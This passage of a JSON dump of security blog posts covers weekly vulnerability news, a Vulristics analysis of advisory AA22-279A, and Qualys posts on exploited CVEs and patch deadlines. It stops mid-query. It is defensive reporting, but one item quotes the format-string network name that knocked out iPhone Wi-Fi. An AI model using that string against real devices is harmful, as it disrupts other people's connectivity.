5. [Dlink DSL2750U - &#x27;Reboot&#x27; Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\\(firmware%20version%201.6\\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.\n 6. [It&#x27;s 2021 and a printf format string in a wireless network&#x27;s name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named &quot;%p%s%s%s%s%n&quot;. Fortunately, the damage appears not to be permanent. Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -&gt; Reset -&gt; Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don&#x27;t connect to unfamiliar Wi-Fi networks.\n\nNow let&#x27;s see some interesting new vulnerabilities.\n\n 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote \u2018War Room\u2019 Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). &quot;A critical security bug in Palo Alto Networks\u2019 Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that \u201cenables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,\u201d according to the security vendor\u2019s Tuesday advisory.\n 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.\n 3. &quot;VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems.&quot; Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.\n 4. [NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.\n 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.\n\nMalware:\n\n 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called [&quot;DarkRadiation&quot;](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that&#x27;s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. &quot;The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,&quot; researchers from Trend Micro said in a report published last week. &quot;The malware uses OpenSSL&#x27;s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram&#x27;s API to send an infection status to the threat actor(s).&quot;\n\nSome statistics for your presentations:\n\n 1. [ Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). &quot;Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours \u2013 which dropped from 20% last year to 9.9% today \u2013 despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware.&quot;\n 2. [&#x27;Set it and forget it&#x27; attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being &quot;minor and non-disruptive to the functionality of even the most complex software applications.&quot; The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that &quot;security&quot; is the third biggest concern when selecting a library \u2013 with &quot;functionality&quot; and &quot;licensing&quot; topping the leader board.\n\nPromising topic:\n\n 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It&#x27;s a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don&#x27;t provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. &quot;With this schema we hope to define a format that all vulnerability databases can export.&quot; Well, let&#x27;s keep an eye on this.\n\nWell, it would probably be worth ending with the words about John McAfee.\n\n[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-28T10:59:53", "type": "avleonov", "title": "Last Week\u2019s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14871", "CVE-2020-3580", "CVE-2020-5135", "CVE-2021-1497", "CVE-2021-20019", "CVE-2021-3044"], "modified": "2021-06-28T10:59:53", "id": "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "href": "http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can&#x27;t just release a list of &quot;20 vulnerabilities most commonly exploited in attacks on American organizations.&quot; They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can&#x27;t help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n&quot;Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078&quot;. \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don&#x27;t forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one &quot;Path Traversal&quot;:\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n&quot;An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal&quot;.\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: &quot;This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**.&quot;\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It&#x27;s also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? Because we can read in the description: &quot;If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**.&quot;\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulrisitcs determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n&quot;\u2026 which resulted in a **remote command execution**.&quot;\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n&quot;\u2026 it is possible to achieve **remote command execution** on the machine.&quot;\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n&quot;\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file.&quot;\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**&quot;\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n&quot;\u2026 this could allow for **remote code execution**.&quot;\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n&quot;\u2026 is vulnerable to **remote code execution**.&quot;\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n&quot;\u2026 allow unauthenticated remote attackers to **bypass authentication**.&quot;\n\nTherefore, do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors&#x27; activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People&#x27;s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect &amp; Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations &amp; Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ 